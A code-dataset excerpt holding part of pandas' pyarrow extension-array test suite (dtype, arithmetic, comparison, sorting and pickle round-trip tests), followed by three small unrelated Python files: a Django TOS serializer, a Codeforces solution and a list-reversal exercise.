yet.\",\n )\n )\n super().test_in_numeric_groupby(data_for_grouping)\n\n @pytest.mark.filterwarnings(\n \"ignore:The default value of numeric_only:FutureWarning\"\n )\n @pytest.mark.parametrize(\"as_index\", [True, False])\n def test_groupby_extension_agg(self, as_index, data_for_grouping, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=ValueError,\n reason=f\"{pa_dtype} only has 2 unique possible values\",\n )\n )\n elif pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow doesn't support factorizing {pa_dtype}\",\n )\n )\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_groupby_extension_agg(as_index, data_for_grouping)\n\n\nclass TestBaseDtype(base.BaseDtypeTests):\n def test_construct_from_string_own_name(self, dtype, request):\n pa_dtype = dtype.pyarrow_dtype\n if pa.types.is_timestamp(pa_dtype) and pa_dtype.tz is not None:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=NotImplementedError,\n reason=f\"pyarrow.type_for_alias cannot infer {pa_dtype}\",\n )\n )\n elif pa.types.is_string(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=TypeError,\n reason=(\n \"Still support StringDtype('pyarrow') \"\n \"over ArrowDtype(pa.string())\"\n ),\n )\n )\n super().test_construct_from_string_own_name(dtype)\n\n def test_is_dtype_from_name(self, dtype, request):\n pa_dtype = dtype.pyarrow_dtype\n if pa.types.is_timestamp(pa_dtype) and pa_dtype.tz is not None:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=NotImplementedError,\n reason=f\"pyarrow.type_for_alias cannot infer {pa_dtype}\",\n )\n )\n elif pa.types.is_string(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=(\n \"Still support StringDtype('pyarrow') \"\n \"over ArrowDtype(pa.string())\"\n ),\n )\n )\n super().test_is_dtype_from_name(dtype)\n\n def test_construct_from_string(self, dtype, request):\n pa_dtype = dtype.pyarrow_dtype\n if pa.types.is_timestamp(pa_dtype) and pa_dtype.tz is not None:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=NotImplementedError,\n reason=f\"pyarrow.type_for_alias cannot infer {pa_dtype}\",\n )\n )\n elif pa.types.is_string(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=TypeError,\n reason=(\n \"Still support StringDtype('pyarrow') \"\n \"over ArrowDtype(pa.string())\"\n ),\n )\n )\n super().test_construct_from_string(dtype)\n\n def test_construct_from_string_another_type_raises(self, dtype):\n msg = r\"'another_type' must end with '\\[pyarrow\\]'\"\n with pytest.raises(TypeError, match=msg):\n type(dtype).construct_from_string(\"another_type\")\n\n def test_get_common_dtype(self, dtype, request):\n pa_dtype = dtype.pyarrow_dtype\n if (\n pa.types.is_date(pa_dtype)\n or pa.types.is_time(pa_dtype)\n or (\n pa.types.is_timestamp(pa_dtype)\n and (pa_dtype.unit != \"ns\" or pa_dtype.tz is not None)\n )\n or (pa.types.is_duration(pa_dtype) and pa_dtype.unit != \"ns\")\n or pa.types.is_string(pa_dtype)\n or pa.types.is_binary(pa_dtype)\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=(\n f\"{pa_dtype} does not have associated numpy \"\n f\"dtype findable by find_common_type\"\n )\n )\n )\n super().test_get_common_dtype(dtype)\n\n\nclass TestBaseIndex(base.BaseIndexTests):\n pass\n\n\nclass TestBaseInterface(base.BaseInterfaceTests):\n @pytest.mark.xfail(reason=\"pyarrow.ChunkedArray does not support views.\")\n def test_view(self, data):\n super().test_view(data)\n\n\nclass TestBaseMissing(base.BaseMissingTests):\n @pytest.mark.filterwarnings(\"ignore:Falling back:pandas.errors.PerformanceWarning\")\n def test_dropna_array(self, data_missing):\n super().test_dropna_array(data_missing)\n\n def test_fillna_no_op_returns_copy(self, data):\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_fillna_no_op_returns_copy(data)\n\n def test_fillna_series_method(self, data_missing, fillna_method):\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_fillna_series_method(data_missing, fillna_method)\n\n\nclass TestBasePrinting(base.BasePrintingTests):\n pass\n\n\nclass TestBaseReshaping(base.BaseReshapingTests):\n @pytest.mark.xfail(reason=\"GH 45419: pyarrow.ChunkedArray does not support views\")\n def test_transpose(self, data):\n super().test_transpose(data)\n\n\nclass TestBaseSetitem(base.BaseSetitemTests):\n @pytest.mark.xfail(reason=\"GH 45419: pyarrow.ChunkedArray does not support views\")\n def test_setitem_preserves_views(self, data):\n super().test_setitem_preserves_views(data)\n\n\nclass TestBaseParsing(base.BaseParsingTests):\n @pytest.mark.parametrize(\"engine\", [\"c\", \"python\"])\n def test_EA_types(self, engine, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(raises=TypeError, reason=\"GH 47534\")\n )\n elif pa.types.is_timestamp(pa_dtype) and pa_dtype.tz is not None:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=NotImplementedError,\n reason=f\"Parameterized types with tz={pa_dtype.tz} not supported.\",\n )\n )\n elif pa.types.is_binary(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(reason=\"CSV parsers don't correctly handle binary\")\n )\n df = pd.DataFrame({\"with_dtype\": pd.Series(data, dtype=str(data.dtype))})\n csv_output = df.to_csv(index=False, na_rep=np.nan)\n if pa.types.is_binary(pa_dtype):\n csv_output = BytesIO(csv_output)\n else:\n csv_output = StringIO(csv_output)\n result = pd.read_csv(\n csv_output, dtype={\"with_dtype\": str(data.dtype)}, engine=engine\n )\n expected = df\n self.assert_frame_equal(result, expected)\n\n\nclass TestBaseUnaryOps(base.BaseUnaryOpsTests):\n def test_invert(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if not pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"pyarrow.compute.invert does support {pa_dtype}\",\n )\n )\n super().test_invert(data)\n\n\nclass TestBaseMethods(base.BaseMethodsTests):\n def test_argsort_missing_array(self, data_missing_for_sorting):\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_argsort_missing_array(data_missing_for_sorting)\n\n @pytest.mark.parametrize(\"periods\", [1, -2])\n def test_diff(self, data, periods, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_unsigned_integer(pa_dtype) and periods == 1:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=(\n f\"diff with {pa_dtype} and periods={periods} will overflow\"\n ),\n )\n )\n super().test_diff(data, periods)\n\n @pytest.mark.filterwarnings(\"ignore:Falling back:pandas.errors.PerformanceWarning\")\n @pytest.mark.parametrize(\"dropna\", [True, False])\n def test_value_counts(self, all_data, dropna, request):\n pa_dtype = all_data.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"value_count has no kernel for {pa_dtype}\",\n )\n )\n super().test_value_counts(all_data, dropna)\n\n def test_value_counts_with_normalize(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"value_count has no pyarrow kernel for {pa_dtype}\",\n )\n )\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_value_counts_with_normalize(data)\n\n @pytest.mark.xfail(\n pa_version_under6p0,\n raises=NotImplementedError,\n reason=\"argmin/max only implemented for pyarrow version >= 6.0\",\n )\n def test_argmin_argmax(\n self, data_for_sorting, data_missing_for_sorting, na_value, request\n ):\n pa_dtype = data_for_sorting.dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=f\"{pa_dtype} only has 2 unique possible values\",\n )\n )\n elif pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"min_max not supported in pyarrow for {pa_dtype}\",\n )\n )\n super().test_argmin_argmax(data_for_sorting, data_missing_for_sorting, na_value)\n\n @pytest.mark.parametrize(\n \"op_name, skipna, expected\",\n [\n (\"idxmax\", True, 0),\n (\"idxmin\", True, 2),\n (\"argmax\", True, 0),\n (\"argmin\", True, 2),\n (\"idxmax\", False, np.nan),\n (\"idxmin\", False, np.nan),\n (\"argmax\", False, -1),\n (\"argmin\", False, -1),\n ],\n )\n def test_argreduce_series(\n self, data_missing_for_sorting, op_name, skipna, expected, request\n ):\n pa_dtype = data_missing_for_sorting.dtype.pyarrow_dtype\n if pa_version_under6p0 and skipna:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=NotImplementedError,\n reason=\"min_max not supported in pyarrow\",\n )\n )\n elif not pa_version_under6p0 and pa.types.is_duration(pa_dtype) and skipna:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"min_max not supported in pyarrow for {pa_dtype}\",\n )\n )\n super().test_argreduce_series(\n data_missing_for_sorting, op_name, skipna, expected\n )\n\n @pytest.mark.parametrize(\n \"na_position, expected\",\n [\n (\"last\", np.array([2, 0, 1], dtype=np.dtype(\"intp\"))),\n (\"first\", np.array([1, 2, 0], dtype=np.dtype(\"intp\"))),\n ],\n )\n def test_nargsort(self, data_missing_for_sorting, na_position, expected):\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_nargsort(data_missing_for_sorting, na_position, expected)\n\n @pytest.mark.parametrize(\"ascending\", [True, False])\n def test_sort_values(self, data_for_sorting, ascending, sort_by_key, request):\n pa_dtype = data_for_sorting.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype) and not ascending:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=(\n f\"unique has no pyarrow kernel \"\n f\"for {pa_dtype} when ascending={ascending}\"\n ),\n )\n )\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_sort_values(data_for_sorting, ascending, sort_by_key)\n\n @pytest.mark.parametrize(\"ascending\", [True, False])\n def test_sort_values_missing(\n self, data_missing_for_sorting, ascending, sort_by_key\n ):\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_sort_values_missing(\n data_missing_for_sorting, ascending, sort_by_key\n )\n\n @pytest.mark.parametrize(\"ascending\", [True, False])\n def test_sort_values_frame(self, data_for_sorting, ascending, request):\n pa_dtype = data_for_sorting.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=(\n f\"dictionary_encode has no pyarrow kernel \"\n f\"for {pa_dtype} when ascending={ascending}\"\n ),\n )\n )\n with tm.maybe_produces_warning(\n PerformanceWarning, pa_version_under7p0, check_stacklevel=False\n ):\n super().test_sort_values_frame(data_for_sorting, ascending)\n\n @pytest.mark.parametrize(\"box\", [pd.Series, lambda x: x])\n @pytest.mark.parametrize(\"method\", [lambda x: x.unique(), pd.unique])\n def test_unique(self, data, box, method, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"unique has no pyarrow kernel for {pa_dtype}.\",\n )\n )\n super().test_unique(data, box, method)\n\n def test_factorize(self, data_for_grouping, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"dictionary_encode has no pyarrow kernel for {pa_dtype}\",\n )\n )\n elif pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=f\"{pa_dtype} only has 2 unique possible values\",\n )\n )\n super().test_factorize(data_for_grouping)\n\n def test_factorize_equivalence(self, data_for_grouping, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"dictionary_encode has no pyarrow kernel for {pa_dtype}\",\n )\n )\n super().test_factorize_equivalence(data_for_grouping)\n\n def test_factorize_empty(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if pa.types.is_duration(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"dictionary_encode has no pyarrow kernel for {pa_dtype}\",\n )\n )\n super().test_factorize_empty(data)\n\n @pytest.mark.xfail(\n reason=\"result dtype pyarrow[bool] better than expected dtype object\"\n )\n def test_combine_le(self, data_repeated):\n super().test_combine_le(data_repeated)\n\n def test_combine_add(self, data_repeated, request):\n pa_dtype = next(data_repeated(1)).dtype.pyarrow_dtype\n if pa.types.is_temporal(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=TypeError,\n reason=f\"{pa_dtype} cannot be added to {pa_dtype}\",\n )\n )\n super().test_combine_add(data_repeated)\n\n def test_searchsorted(self, data_for_sorting, as_series, request):\n pa_dtype = data_for_sorting.dtype.pyarrow_dtype\n if pa.types.is_boolean(pa_dtype):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=f\"{pa_dtype} only has 2 unique possible values\",\n )\n )\n super().test_searchsorted(data_for_sorting, as_series)\n\n def test_basic_equals(self, data):\n # https://github.com/pandas-dev/pandas/issues/34660\n assert pd.Series(data).equals(pd.Series(data))\n\n\nclass TestBaseArithmeticOps(base.BaseArithmeticOpsTests):\n\n divmod_exc = NotImplementedError\n\n def _patch_combine(self, obj, other, op):\n # BaseOpsUtil._combine can upcast expected dtype\n # (because it generates expected on python scalars)\n # while ArrowExtensionArray maintains original type\n expected = base.BaseArithmeticOpsTests._combine(self, obj, other, op)\n was_frame = False\n if isinstance(expected, pd.DataFrame):\n was_frame = True\n expected_data = expected.iloc[:, 0]\n original_dtype = obj.iloc[:, 0].dtype\n else:\n expected_data = expected\n original_dtype = obj.dtype\n pa_array = pa.array(expected_data._values).cast(original_dtype.pyarrow_dtype)\n pd_array = type(expected_data._values)(pa_array)\n if was_frame:\n expected = pd.DataFrame(\n pd_array, index=expected.index, columns=expected.columns\n )\n else:\n expected = pd.Series(pd_array)\n return expected\n\n def test_arith_series_with_scalar(\n self, data, all_arithmetic_operators, request, monkeypatch\n ):\n pa_dtype = data.dtype.pyarrow_dtype\n\n arrow_temporal_supported = not pa_version_under8p0 and (\n all_arithmetic_operators in (\"__add__\", \"__radd__\")\n and pa.types.is_duration(pa_dtype)\n or all_arithmetic_operators in (\"__sub__\", \"__rsub__\")\n and pa.types.is_temporal(pa_dtype)\n )\n if all_arithmetic_operators == \"__rmod__\" and (\n pa.types.is_string(pa_dtype) or pa.types.is_binary(pa_dtype)\n ):\n pytest.skip(\"Skip testing Python string formatting\")\n elif all_arithmetic_operators in {\n \"__mod__\",\n \"__rmod__\",\n }:\n self.series_scalar_exc = NotImplementedError\n elif arrow_temporal_supported:\n self.series_scalar_exc = None\n elif not (\n pa.types.is_floating(pa_dtype)\n or pa.types.is_integer(pa_dtype)\n or arrow_temporal_supported\n ):\n self.series_scalar_exc = pa.ArrowNotImplementedError\n else:\n self.series_scalar_exc = None\n if (\n all_arithmetic_operators == \"__rpow__\"\n and (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype))\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=(\n f\"GH 29997: 1**pandas.NA == 1 while 1**pyarrow.NA == NULL \"\n f\"for {pa_dtype}\"\n )\n )\n )\n elif arrow_temporal_supported:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=TypeError,\n reason=(\n f\"{all_arithmetic_operators} not supported between\"\n f\"pd.NA and {pa_dtype} Python scalar\"\n ),\n )\n )\n elif (\n all_arithmetic_operators in {\"__rtruediv__\", \"__rfloordiv__\"}\n and (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype))\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=\"divide by 0\",\n )\n )\n if all_arithmetic_operators == \"__floordiv__\" and pa.types.is_integer(pa_dtype):\n # BaseOpsUtil._combine always returns int64, while ArrowExtensionArray does\n # not upcast\n monkeypatch.setattr(TestBaseArithmeticOps, \"_combine\", self._patch_combine)\n super().test_arith_series_with_scalar(data, all_arithmetic_operators)\n\n def test_arith_frame_with_scalar(\n self, data, all_arithmetic_operators, request, monkeypatch\n ):\n pa_dtype = data.dtype.pyarrow_dtype\n\n arrow_temporal_supported = not pa_version_under8p0 and (\n all_arithmetic_operators in (\"__add__\", \"__radd__\")\n and pa.types.is_duration(pa_dtype)\n or all_arithmetic_operators in (\"__sub__\", \"__rsub__\")\n and pa.types.is_temporal(pa_dtype)\n )\n if all_arithmetic_operators == \"__rmod__\" and (\n pa.types.is_string(pa_dtype) or pa.types.is_binary(pa_dtype)\n ):\n pytest.skip(\"Skip testing Python string formatting\")\n elif all_arithmetic_operators in {\n \"__mod__\",\n \"__rmod__\",\n }:\n self.frame_scalar_exc = NotImplementedError\n elif arrow_temporal_supported:\n self.frame_scalar_exc = None\n elif not (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype)):\n self.frame_scalar_exc = pa.ArrowNotImplementedError\n else:\n self.frame_scalar_exc = None\n if (\n all_arithmetic_operators == \"__rpow__\"\n and (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype))\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=(\n f\"GH 29997: 1**pandas.NA == 1 while 1**pyarrow.NA == NULL \"\n f\"for {pa_dtype}\"\n )\n )\n )\n elif arrow_temporal_supported:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=TypeError,\n reason=(\n f\"{all_arithmetic_operators} not supported between\"\n f\"pd.NA and {pa_dtype} Python scalar\"\n ),\n )\n )\n elif (\n all_arithmetic_operators in {\"__rtruediv__\", \"__rfloordiv__\"}\n and (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype))\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=\"divide by 0\",\n )\n )\n if all_arithmetic_operators == \"__floordiv__\" and pa.types.is_integer(pa_dtype):\n # BaseOpsUtil._combine always returns int64, while ArrowExtensionArray does\n # not upcast\n monkeypatch.setattr(TestBaseArithmeticOps, \"_combine\", self._patch_combine)\n super().test_arith_frame_with_scalar(data, all_arithmetic_operators)\n\n def test_arith_series_with_array(\n self, data, all_arithmetic_operators, request, monkeypatch\n ):\n pa_dtype = data.dtype.pyarrow_dtype\n\n arrow_temporal_supported = not pa_version_under8p0 and (\n all_arithmetic_operators in (\"__add__\", \"__radd__\")\n and pa.types.is_duration(pa_dtype)\n or all_arithmetic_operators in (\"__sub__\", \"__rsub__\")\n and pa.types.is_temporal(pa_dtype)\n )\n if all_arithmetic_operators in {\n \"__mod__\",\n \"__rmod__\",\n }:\n self.series_array_exc = NotImplementedError\n elif arrow_temporal_supported:\n self.series_array_exc = None\n elif not (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype)):\n self.series_array_exc = pa.ArrowNotImplementedError\n else:\n self.series_array_exc = None\n if (\n all_arithmetic_operators == \"__rpow__\"\n and (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype))\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=(\n f\"GH 29997: 1**pandas.NA == 1 while 1**pyarrow.NA == NULL \"\n f\"for {pa_dtype}\"\n )\n )\n )\n elif (\n all_arithmetic_operators\n in (\n \"__sub__\",\n \"__rsub__\",\n )\n and pa.types.is_unsigned_integer(pa_dtype)\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=(\n f\"Implemented pyarrow.compute.subtract_checked \"\n f\"which raises on overflow for {pa_dtype}\"\n ),\n )\n )\n elif arrow_temporal_supported:\n request.node.add_marker(\n pytest.mark.xfail(\n raises=TypeError,\n reason=(\n f\"{all_arithmetic_operators} not supported between\"\n f\"pd.NA and {pa_dtype} Python scalar\"\n ),\n )\n )\n elif (\n all_arithmetic_operators in {\"__rtruediv__\", \"__rfloordiv__\"}\n and (pa.types.is_floating(pa_dtype) or pa.types.is_integer(pa_dtype))\n and not pa_version_under6p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=\"divide by 0\",\n )\n )\n op_name = all_arithmetic_operators\n ser = pd.Series(data)\n # pd.Series([ser.iloc[0]] * len(ser)) may not return ArrowExtensionArray\n # since ser.iloc[0] is a python scalar\n other = pd.Series(pd.array([ser.iloc[0]] * len(ser), dtype=data.dtype))\n if pa.types.is_floating(pa_dtype) or (\n pa.types.is_integer(pa_dtype) and all_arithmetic_operators != \"__truediv__\"\n ):\n monkeypatch.setattr(TestBaseArithmeticOps, \"_combine\", self._patch_combine)\n self.check_opname(ser, op_name, other, exc=self.series_array_exc)\n\n def test_add_series_with_extension_array(self, data, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if not (\n pa.types.is_integer(pa_dtype)\n or pa.types.is_floating(pa_dtype)\n or (not pa_version_under8p0 and pa.types.is_duration(pa_dtype))\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=NotImplementedError,\n reason=f\"add_checked not implemented for {pa_dtype}\",\n )\n )\n elif pa_dtype.equals(\"int8\"):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowInvalid,\n reason=f\"raises on overflow for {pa_dtype}\",\n )\n )\n super().test_add_series_with_extension_array(data)\n\n\nclass TestBaseComparisonOps(base.BaseComparisonOpsTests):\n def assert_series_equal(self, left, right, *args, **kwargs):\n # Series.combine for \"expected\" retains bool[pyarrow] dtype\n # While \"result\" return \"boolean\" dtype\n right = pd.Series(right._values.to_numpy(), dtype=\"boolean\")\n super().assert_series_equal(left, right, *args, **kwargs)\n\n def test_compare_array(self, data, comparison_op, na_value, request):\n pa_dtype = data.dtype.pyarrow_dtype\n ser = pd.Series(data)\n # pd.Series([ser.iloc[0]] * len(ser)) may not return ArrowExtensionArray\n # since ser.iloc[0] is a python scalar\n other = pd.Series(pd.array([ser.iloc[0]] * len(ser), dtype=data.dtype))\n if comparison_op.__name__ in [\"eq\", \"ne\"]:\n # comparison should match point-wise comparisons\n result = comparison_op(ser, other)\n # Series.combine does not calculate the NA mask correctly\n # when comparing over an array\n assert result[8] is na_value\n assert result[97] is na_value\n expected = ser.combine(other, comparison_op)\n expected[8] = na_value\n expected[97] = na_value\n self.assert_series_equal(result, expected)\n\n else:\n exc = None\n try:\n result = comparison_op(ser, other)\n except Exception as err:\n exc = err\n\n if exc is None:\n # Didn't error, then should match point-wise behavior\n if pa.types.is_temporal(pa_dtype):\n # point-wise comparison with pd.NA raises TypeError\n assert result[8] is na_value\n assert result[97] is na_value\n result = result.drop([8, 97]).reset_index(drop=True)\n ser = ser.drop([8, 97])\n other = other.drop([8, 97])\n expected = ser.combine(other, comparison_op)\n self.assert_series_equal(result, expected)\n else:\n with pytest.raises(type(exc)):\n ser.combine(other, comparison_op)\n\n def test_invalid_other_comp(self, data, comparison_op):\n # GH 48833\n with pytest.raises(\n NotImplementedError, match=\".* not implemented for \"\n ):\n comparison_op(data, object())\n\n\ndef test_arrowdtype_construct_from_string_type_with_unsupported_parameters():\n with pytest.raises(NotImplementedError, match=\"Passing pyarrow type\"):\n ArrowDtype.construct_from_string(\"timestamp[s, tz=UTC][pyarrow]\")\n\n\n@pytest.mark.parametrize(\n \"interpolation\", [\"linear\", \"lower\", \"higher\", \"nearest\", \"midpoint\"]\n)\n@pytest.mark.parametrize(\"quantile\", [0.5, [0.5, 0.5]])\ndef test_quantile(data, interpolation, quantile, request):\n pa_dtype = data.dtype.pyarrow_dtype\n if not (pa.types.is_integer(pa_dtype) or pa.types.is_floating(pa_dtype)):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"quantile not supported by pyarrow for {pa_dtype}\",\n )\n )\n data = data.take([0, 0, 0])\n ser = pd.Series(data)\n result = ser.quantile(q=quantile, interpolation=interpolation)\n if quantile == 0.5:\n assert result == data[0]\n else:\n # Just check the values\n result = result.astype(\"float64[pyarrow]\")\n expected = pd.Series(\n data.take([0, 0]).astype(\"float64[pyarrow]\"), index=[0.5, 0.5]\n )\n tm.assert_series_equal(result, expected)\n\n\n@pytest.mark.xfail(\n pa_version_under6p0,\n raises=NotImplementedError,\n reason=\"mode only supported for pyarrow version >= 6.0\",\n)\n@pytest.mark.parametrize(\"dropna\", [True, False])\n@pytest.mark.parametrize(\n \"take_idx, exp_idx\",\n [[[0, 0, 2, 2, 4, 4], [4, 0]], [[0, 0, 0, 2, 4, 4], [0]]],\n ids=[\"multi_mode\", \"single_mode\"],\n)\ndef test_mode(data_for_grouping, dropna, take_idx, exp_idx, request):\n pa_dtype = data_for_grouping.dtype.pyarrow_dtype\n if (\n pa.types.is_temporal(pa_dtype)\n or pa.types.is_string(pa_dtype)\n or pa.types.is_binary(pa_dtype)\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n raises=pa.ArrowNotImplementedError,\n reason=f\"mode not supported by pyarrow for {pa_dtype}\",\n )\n )\n elif (\n pa.types.is_boolean(pa_dtype)\n and \"multi_mode\" in request.node.nodeid\n and pa_version_under9p0\n ):\n request.node.add_marker(\n pytest.mark.xfail(\n reason=\"https://issues.apache.org/jira/browse/ARROW-17096\",\n )\n )\n data = data_for_grouping.take(take_idx)\n ser = pd.Series(data)\n result = ser.mode(dropna=dropna)\n expected = pd.Series(data_for_grouping.take(exp_idx))\n tm.assert_series_equal(result, expected)\n\n\ndef test_is_bool_dtype():\n # GH 22667\n data = ArrowExtensionArray(pa.array([True, False, True]))\n assert is_bool_dtype(data)\n assert pd.core.common.is_bool_indexer(data)\n s = pd.Series(range(len(data)))\n result = s[data]\n expected = s[np.asarray(data)]\n tm.assert_series_equal(result, expected)\n\n\ndef test_pickle_roundtrip(data):\n # GH 42600\n expected = pd.Series(data)\n expected_sliced = expected.head(2)\n full_pickled = pickle.dumps(expected)\n sliced_pickled = pickle.dumps(expected_sliced)\n\n assert len(full_pickled) > len(sliced_pickled)\n\n result = pickle.loads(full_pickled)\n tm.assert_series_equal(result, expected)\n\n result_sliced = pickle.loads(sliced_pickled)\n tm.assert_series_equal(result_sliced, expected_sliced)\n\n\ndef test_astype_from_non_pyarrow(data):\n # GH49795\n pd_array = data._data.to_pandas().array\n result = pd_array.astype(data.dtype)\n assert not isinstance(pd_array.dtype, ArrowDtype)\n assert isinstance(result.dtype, ArrowDtype)\n tm.assert_extension_array_equal(result, data)\n","repo_name":"OpenSource-A-414/opensource-A--414","sub_path":"pandas-main/pandas/tests/extension/test_arrow.py","file_name":"test_arrow.py","file_ext":"py","file_size_in_byte":52395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"484523780","text":"\"\"\"Serializers collection for TOS application\"\"\"\nfrom rest_framework import serializers\nfrom apps.tos.models import SignedTOS\n\nclass TOSSerializer(serializers.ModelSerializer):\n \"\"\"\n Serializer for TOS model.\n \"\"\"\n text = serializers.SerializerMethodField()\n\n class Meta:\n fields = [\n \"uuid\",\n \"first_name\",\n \"last_name\",\n \"street\",\n \"post_code\",\n \"text\",\n \"created_at\",\n ]\n model = SignedTOS\n\n def text(self, obj):\n return obj.text\n","repo_name":"vchernetsov/rnc_test","sub_path":"source/apps/tos/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73209723306","text":"a = int(input())\nb = int(input())\nc = int(input())\n\nans = 0\nif a == 1:\n ans = a + b\n if c == 1:\n ans += c\n else:\n ans *= c\nelif b == 1:\n ans = (b + min(a,c)) * max(a, c)\nelif c == 1:\n ans = (b + c) * a\nelse:\n ans = a * b * c\n\nprint(ans)","repo_name":"leonel1301/Python-Exercises","sub_path":"CodeForces/479A.py","file_name":"479A.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27105672903","text":"# 2. Write a function that takes a list of strings as an argument and returns a new list of strings that are all reversed.\ndef reverse_list (list_of_string, sp = ''):\n new_list = []\n for i in list_of_string:\n elem = list(i)\n elem.reverse()\n elem_for_new_list = []\n for k in elem:\n elem_for_new_list.append(k)\n new_list.append(sp.join(elem_for_new_list))\n return new_list\nprint(reverse_list(['Windows', 'macOS', 'Linux']))\n","repo_name":"MikitaTsiarentsyeu/Md-PT1-61-23","sub_path":"Tasks/Alinovskaya/Task5/Task5_2.py","file_name":"Task5_2.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 